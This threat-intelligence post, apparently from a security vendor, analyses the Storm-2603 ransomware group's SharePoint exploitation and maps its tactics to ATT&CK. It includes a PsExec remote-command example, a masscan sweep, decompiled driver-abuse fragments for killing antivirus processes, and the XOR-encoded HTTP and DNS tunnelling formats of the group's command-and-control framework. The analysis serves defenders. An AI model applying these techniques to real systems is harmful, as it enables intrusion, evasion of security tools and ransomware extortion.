.svg)
.svg)
Storm-2603 Ransomware Campaign Targets Microsoft SharePoint in 2025: Activity and TTP Analysis
Storm-2603 is a financially motivated threat actor group known for deploying ransomware, including LockBit Black and WarLock/X2anylock. Their operations were first observed targeting organizations in Latin America and the APAC region during the first half of 2025. A major activity was observed on July 18, 2025, when Microsoft identified Storm-2603 deploying ransomware by exploiting multiple Microsoft SharePoint Server vulnerabilities, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.
In the following sections, we will further review the historical and significant activities attributed to the Storm-2603 group, provide a detailed breakdown of their Tactics, Techniques, and Procedures (TTPs) and conclude with a section on how organizations can evaluate and strengthen their defensive posture against this threat actor by leveraging the Picus Platform to validate their security controls and identify exploitable gaps continuously.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
History & Major Activities of Storm-2603 Group
-
First Half of 2025 - According to VirusTotal data, Storm-2603 likely targeted organizations in Latin America while simultaneously conducting attacks on organizations in the APAC [1].
-
18 July 2025 - Microsoft reported that the threat actor Storm-2603 had deployed ransomware by exploiting multiple vulnerabilities, specifically CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 [2].
ATT&CK Mapping (TTPs) of Storm-2603 Group
Tactic: Initial Access
T1190 Exploit Public-Facing Application
Storm-2603 gains initial access by exploiting vulnerabilities in Microsoft SharePoint Server, tracked as "ToolShell". This exploit chain targets specific vulnerabilities, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 [1].
Tactic: Execution
T1569.002 System Services: Service Execution
Storm-2603 uses PsExec, a legitimate command-line tool from the Microsoft Sysinternals suite [1]. Adversaries frequently abuse tools like PsExec to interact with other systems, deploy malware, and run arbitrary commands across the network.
The command below uses PsExec to run the whoami command on the remote computer at IP address 192.168.1.10, using the credentials "DOMAIN\AdminUser" and "password123" to authenticate.
|
psexec.exe \\192.168.1.10 -u DOMAIN\AdminUser -p password123 whoami |
Tactic: Defense Evasion
T1562.001 Impair Defenses: Disable or Modify Tools
The actor employs the "Bring Your Own Vulnerable Driver" (BYOVD) technique to disable endpoint security products before deploying ransomware. Their custom tool, VMToolsEng.exe, loads a legitimately signed but vulnerable driver named ServiceMouse.sys (a renamed version of AToolsKrnl64.sys) into the kernel. By exploiting vulnerabilities in this driver, the user-mode tool can send IOCTL commands to perform privileged kernel-level actions like terminating antivirus processes [1]. This allows the actor to disable defenses.
The tool sets up a service named ServiceMouse, pointing it to the ServiceMouse.sys driver included in the package. The code that creates the service is shown below [1]:
|
hServicea = CreateServiceW( |
After installation, it communicates with the service using IO control code 0x99000050 to terminate processes. It also supports additional actions through separate IO control codes: 0x990000D0 for deleting files and 0x990001D0 for uninstalling drivers. The code snippets below demonstrate how the 0x99000050 code is used to kill processes [1].
|
sub_14000C8C0((__int64)v8, InBuffer); |
The code above shows how the IOCTL command 0x99000050 is sent [1].
|
case 0x9900050: |
The above block is the implementation inside the driver that handles the specific IOCTL command 0x9900050 that was sent [1].
|
if ( CurrentProcessId_1 ) |
The last code snippet shows that the ZwTerminateProcess function is used for terminating processes [1].
T1574.001 Hijack Execution Flow: DLL
Storm-2603 leverages DLL search order hijacking to deploy ransomware by placing a malicious library next to a trusted, signed executable so the application loads attacker-controlled code. Documented cases include pairing MpCmdRun.exe with a spoofed Mpclient.dll to deliver Warlock ransomware, clink_x86.exe with a rogue clink_dll_x86.dll to deploy LockBit Black, and z.exe with a fake z.dll to launch x2anylock [1]. This technique exploits Windows' preference for loading DLLs, allowing execution under the guise of legitimate binaries.
Tactic: Discovery
T1046 Network Service Discovery
After gaining access, Storm-2603 uses masscan [1], a high-speed port scanner, to discover live hosts and open services across the internal network.
|
masscan -p80,443,22 192.168.1.0/24 --rate 100000 -oG output.grep |
This command uses the masscan tool to rapidly scan the 192.168.1.0/24 network for open ports 80, 443, and 22 at a rate of 100,000 packets per second.
T1082 System Information Discovery
To gather detailed system information, Storm-2603 employs SharpHostInfo [1], an open-source tool that collects host and domain details in Windows environments. This allows the actor to obtain granular data such as OS version, patch levels, and hardware specifications, which is crucial for tailoring subsequent attacks.
|
SharpHostInfo.exe --all |
This command executes the SharpHostInfo tool to gather all available host and network configuration details, including critical intelligence such as the system's hostname, operating system, logged-in users, network interfaces, accessible file shares, and running services.
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
The ak47c2 framework includes a C2 channel called ak47http, an HttpClient backdoor that communicates over plain HTTP. It exchanges data by sending a JSON object in the body of an HTTP POST request to the server's root path ("/"), with payloads obfuscated by first applying a simple XOR cipher using the static ASCII key "VHBD@H", then converting the result to a hexadecimal string. The server responds with a similarly encoded JSON whose cmd field provides the next instruction, which the implant executes using cmd.exe /c <command> 2>&1 and returns the output. A typical task request object follows this structure:
|
{"cmd":"","cmd_id":"","fqdn":"<computer>","result":"","type":"task"} |
After the host runs a command, it returns the outcome labeled with the type "result" [1].
T1071.004 Application Layer Protocol: DNS
Storm-2603 operates a custom command-and-control framework, ak47c2, which includes a DNS tunneling client called ak47dns (dnsclient) to hide C2 traffic within DNS TXT and MG record lookups to update.micfosoft[.]com. Upon execution, the client hides its console, retrieves the host's computer name (falling back to unknown.local), generates a random five-character session ID, and constructs DNS queries that encode task or result tags, size flags, and the computer name. These elements are XOR‑encoded with the ASCII key "VHBD@H", hex-encoded, concatenated with dots, and prepended to the C2 domain, using prefixes like 1<sessionID> for task requests and 2<sessionID> for result uploads. For outputs exceeding 0xFF bytes, results are fragmented into 63-byte chunks and sent with segmented query labels that mark segmentation (s), total segment count (t), and the current position (p). Below, both query types are given [1]:
Query format used for outputs less than or equal to 0xFF bytes:
|
<task|result><sessionID>.a<sessionID>.<computerName>.update.micfosoft[.]com |
Query format used for outputs larger than 0xFF bytes:
|
<task|result><sessionID>.**s**<sessionID>**t**<TOTAL>**p**<POS>.<segment1>.<segment2>.update.micfosoft[.]com |
Tactic: Impact
T1486 Data Encrypted for Impact
The final objective for Storm-2603 is to deploy ransomware that encrypts critical files, thereby disrupting business operations to extort a payment. The group has been observed deploying at least two distinct ransomware families, LockBit Black and WarLock/X2anylock. Storm-2603 uses uniform ransom notes after encryption across its ransomware variants, differing mainly by file name. For x2anylock, the note is titled "How to decrypt my data.log", while for LockBit Black, it appears as "<Ransomware ID>.README.txt". Each note contains a brief message [1]:
|
Your decrypt ID: [redacted] |
How Picus Simulates Storm-2603 Attacks?
We also strongly suggest simulating Storm-2603 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Storm-2603:
|
Threat ID |
Threat Name |
Attack Module |
|
66538 |
Storm-2603 Threat Group Campaign Malware Email Threat |
Network Infiltration |
|
32466 |
Storm-2603 Threat Group Campaign Malware Download Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "Before ToolShell: Exploring Storm-2603's Previous Ransomware Operations," Check Point Research. Accessed: Oct. 19, 2025. [Online]. Available: https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/
[2] M. T. Intelligence, "Disrupting active exploitation of on-premises SharePoint vulnerabilities," Microsoft Security Blog. Accessed: Oct. 20, 2025. [Online]. Available: https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
